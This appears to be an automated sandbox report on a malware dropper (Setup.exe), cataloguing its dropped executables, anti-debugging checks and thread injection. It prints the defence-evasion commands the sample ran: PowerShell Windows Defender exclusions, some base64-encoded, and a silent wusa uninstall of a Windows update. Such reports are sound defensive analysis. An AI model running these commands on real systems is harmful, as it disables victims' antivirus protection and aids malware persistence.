Source: C:\Users\user\AppData\Local\Temp\fix.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_01519FA0 LdrInitializeThunk, 7_2_01519FA0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00007FF7F050B1B8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F05140D0 GetProcessHeap, 6_2_00007FF7F05140D0
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\fix.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_0040159D EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit, 0_2_0040159D
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Code function: 3_2_00007FF7010C1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit, 3_2_00007FF7010C1160
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00007FF7F050B1B8
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04FBE20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00007FF7F04FBE20
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04FC6AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00007FF7F04FC6AC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04FC88C SetUnhandledExceptionFilter, 6_2_00007FF7F04FC88C
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Code function: 8_2_00007FF68CC61160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_c_exit, 8_2_00007FF68CC61160
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0B3CE0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FFE0C0B3CE0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0B3710 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FFE0C0B3710
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE1025A0C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FFE1025A0C0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE1025AB08 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FFE1025AB08
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10306554 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FFE10306554
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE10305FB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FFE10305FB0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE11520AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FFE11520AA8
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE12E12BCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FFE12E12BCC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE12E130AC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FFE12E130AC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C52F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00007FFE130C52F0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE130C4D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00007FFE130C4D20
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BCB1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF702BCB1B8
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BBC88C SetUnhandledExceptionFilter, 18_2_00007FF702BBC88C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BBC6AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF702BBC6AC
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BBBE20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00007FF702BBBE20
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE014C6554 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FFE014C6554
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE014C5FB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE014C5FB0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0B3CE0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FFE0C0B3CE0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0B3710 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE0C0B3710
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE101E0AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE101E0AA8
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE10303398 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FFE10303398
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE10302DD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE10302DD0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE11501AC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FFE11501AC0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE115014F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE115014F0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE1151AB08 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FFE1151AB08
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE1151A0C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE1151A0C0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C52F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FFE120C52F0
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE120C4D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE120C4D20
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE12E12BCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFE12E12BCC
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE12E130AC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 19_2_00007FFE12E130AC
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Code function: 38_2_00007FF7A81D1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit, 38_2_00007FF7A81D1160
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Code function: 43_2_00007FF7ECBC1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit, 43_2_00007FF7ECBC1160
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE01216554 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_00007FFE01216554
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE01215FB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE01215FB0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE10260AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE10260AA8
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F52F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_00007FFE110F52F0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE110F4D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE110F4D20
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE130C1AC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_00007FFE130C1AC0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE130C14F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE130C14F0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13203398 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_00007FFE13203398
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13202DD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE13202DD0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13233710 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE13233710
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13233CE0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_00007FFE13233CE0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE1325A0C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE1325A0C0
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE1325AB08 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_00007FFE1325AB08
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE148E2BCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 48_2_00007FFE148E2BCC
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE148E30AC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 48_2_00007FFE148E30AC
Source: C:\Windows\System32\conhost.exe Code function: 52_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 52_2_0000000140001160
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0E173398 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 57_2_00007FFE0E173398
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0E172DD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE0E172DD0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB33710 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE0EB33710
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB33CE0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 57_2_00007FFE0EB33CE0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB55FB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE0EB55FB0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB56554 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 57_2_00007FFE0EB56554
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE110752F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 57_2_00007FFE110752F0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11074D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE11074D20
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BB1AC0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 57_2_00007FFE11BB1AC0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BB14F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE11BB14F0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BCAB08 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 57_2_00007FFE11BCAB08
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11BCA0C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE11BCA0C0
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE11EB0AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE11EB0AA8
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE1A4730AC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 57_2_00007FFE1A4730AC
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE1A472BCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 57_2_00007FFE1A472BCC
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\Setup.exe Process created: Base64 decoded <#gqr#>Add-MpPreference <#sbm#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#hzb#> -Force <#djn#>
Source: C:\Users\user\Desktop\Setup.exe Process created: Base64 decoded <#gqr#>Add-MpPreference <#sbm#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#hzb#> -Force <#djn#> Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Thread register set: target process: 7836
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Thread register set: target process: 7904
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAYgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAegBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAagBuACMAPgA=" Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\hamburger.exe "C:\Users\user\AppData\Local\Temp\hamburger.exe" Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\Notepad.exe "C:\Users\user\AppData\Local\Temp\Notepad.exe" Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\mergedALL.exe "C:\Users\user\AppData\Local\Temp\mergedALL.exe" Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\etc test.exe "C:\Users\user\AppData\Local\Temp\etc test.exe" Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\fix.exe "C:\Users\user\AppData\Local\Temp\fix.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Process created: C:\Users\user\AppData\Local\Temp\Notepad.exe "C:\Users\user\AppData\Local\Temp\Notepad.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im "Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\Notepad.exe "Notepad.exe"
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Process created: C:\Windows\System32\conhost.exe conhost.exe
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Notepad.exe Process created: C:\Users\user\Notepad.exe "C:\Users\user\Notepad.exe"
Uses taskkill to terminate processes
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /im "Notepad.exe"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagcacqbyacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahmaygbtacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajaggaegbiacmapgagac0argbvahiaywblacaapaajagqaagbuacmapga="
Source: C:\Users\user\Desktop\Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagcacqbyacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahmaygbtacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajaggaegbiacmapgagac0argbvahiaywblacaapaajagqaagbuacmapga=" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F051A420 cpuid 6_2_00007FF7F051A420
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
